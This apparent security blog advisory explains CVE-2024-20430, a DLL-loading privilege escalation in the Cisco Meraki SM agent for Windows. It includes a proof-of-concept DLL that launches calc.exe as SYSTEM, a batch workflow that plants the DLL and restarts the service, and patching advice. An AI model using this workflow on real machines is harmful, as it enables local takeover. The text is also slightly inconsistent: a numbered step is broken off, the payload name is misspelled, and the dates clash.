Published: June 2024
Vulnerability Score: 8.4 (High)
Component Affected: Cisco Meraki Systems Manager (SM) Agent for Windows
Overview
A serious vulnerability (CVE-2024-20430) has been discovered in the Cisco Meraki Systems Manager (SM) Agent for Windows. If you're running this agent, be aware: a local attacker with just basic user access can potentially take full control over your system by uploading malicious files. This can lead to arbitrary code execution with SYSTEM-level privileges—the highest privilege on Windows.
Let's break down the details, the root cause, and show you how this attack works.
What Causes the Vulnerability?
The issue lies in how the Cisco Meraki SM agent processes directories and searches for files during startup. Simply put, the program does not securely handle search paths for configuration or DLL files. This opens the door for an attacker to:
Make the Cisco Meraki SM Agent read and execute these files upon boot, but with SYSTEM privileges.
No admin access is needed to plant the files—just being a local user on the Windows endpoint is enough!
Here’s a step-by-step breakdown
1. Attacker Gains Local Access: The attacker only needs a standard (low-privileged) Windows account.
A malicious DLL containing their payload (could spawn a shell, add a user, etc.).
3. Drop the Malicious Files: Files are placed in a folder searched by the Meraki SM agent during startup (usually something like C:\ProgramData\Meraki\SM\).
4. Trigger the Launch: When the system reboots, or the Meraki SM service restarts, the agent loads the attacker’s configuration and DLL.
5. Privilege Escalation: The system runs the attacker’s DLL as SYSTEM, granting full control over the PC.
Code Example: Malicious DLL
Below is a minimal C++ DLL payload that spawns a SYSTEM-level shell (calculatore.exe). On a real system, the payload could be anything from a reverse shell to adding a new admin user.
// dllmain.cpp
#include <windows.h>
#pragma comment(linker, "/export:SomeExportedFunc=?SomeExportedFunc@@YAHXZ")
BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
WinExec("calc.exe", SW_SHOW); // Runs calc.exe as SYSTEM
}
return TRUE;
}
Compile the DLL:
cl /LD dllmain.cpp
You might need to match the exported function name expected by the agent or referenced in the config file.
Example Exploit Workflow
REM 1. Copy config and DLL to a writable agent path
copy attacker-config.json "C:\ProgramData\Meraki\SM\config.json"
copy evil.dll "C:\ProgramData\Meraki\SM\evil.dll"
REM 2. Restart the Meraki SM agent/service (or just reboot)
net stop merakiAgent
net start merakiAgent
REM 3. Wait for SYSTEM-level code exec!
Who's At Risk?
- Anyone running Cisco Meraki SM Agent for Windows (see exact vulnerable versions in official advisory).
Attackers need local logon access (physical user or RDP session).
Note: This is not a remote exploit but could be chained with other attacks for larger impact.
Mitigation & Recommendations
- Upgrade: Patch as soon as a fix is available (Cisco Security Advisory).
- Restrict directory permissions for agent paths so non-admins cannot write/modify files.
References
- Cisco Security Advisory: CVE-2024-20430
- NVD – CVE-2024-20430 Overview
- Cisco Meraki Official Site
Conclusion
CVE-2024-20430 underscores the critical need to manage DLL search order vulnerabilities and directory permission hygiene. If you use Cisco Meraki Systems Manager, patch it ASAP and check your devices for tampering.
Stay safe, and always sandbox unknown software!
*This article is based on original research and public advisories. For responsible disclosure and detailed technical guidance, always check the vendor's official documentation.*
Timeline
Published on: 09/12/2024 20:15:04 UTC
Last modified on: 09/12/2024 21:34:55 UTC